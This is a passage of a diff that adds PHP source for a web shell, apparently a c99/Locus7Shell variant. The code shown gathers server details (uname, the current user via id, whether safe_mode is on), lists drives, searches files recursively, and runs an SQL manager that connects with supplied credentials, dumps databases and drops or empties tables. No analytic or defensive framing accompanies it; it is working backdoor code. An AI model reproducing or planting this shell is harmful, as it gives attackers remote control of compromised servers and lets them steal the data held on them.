+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #009900; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #009900;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center><img src="http://img244.imageshack.us/img244/6663/locus7sgm8.jpg"></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+foreach($pd as $b) 
+{ 
+ $t = ""; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
+ $i++; 
+} 
+echo "&nbsp;&nbsp;&nbsp;"; 
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo "<b>".view_perms_color($d)."</b>"; 
+} 
+if (is_callable("disk_free_space")) 
+{ 
+ $free = disk_free_space($d); 
+ $total = disk_total_space($d); 
+ if ($free === FALSE) {$free = 0;} 
+ if ($total === FALSE) {$total = 0;} 
+ if ($free < 0) {$free = 0;} 
+ if ($total < 0) {$total = 0;} 
+ $used = $total-$free; 
+ $free_percent = round(100/($total/$free),2); 
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
+} 
+echo "<br>";
+echo "<b>Your ip: <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>"; 
+$letters = ""; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range("a","z") as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
+  if (!$bool) {$bool = is_dir($letter.":\\");} 
+  if ($bool) 
+  { 
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
+   if ($letter.":" != $v) {$letters .= $letter;} 
+   else {$letters .= "<font color=green>".$letter."</font>";} 
+   $letters .= " ]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
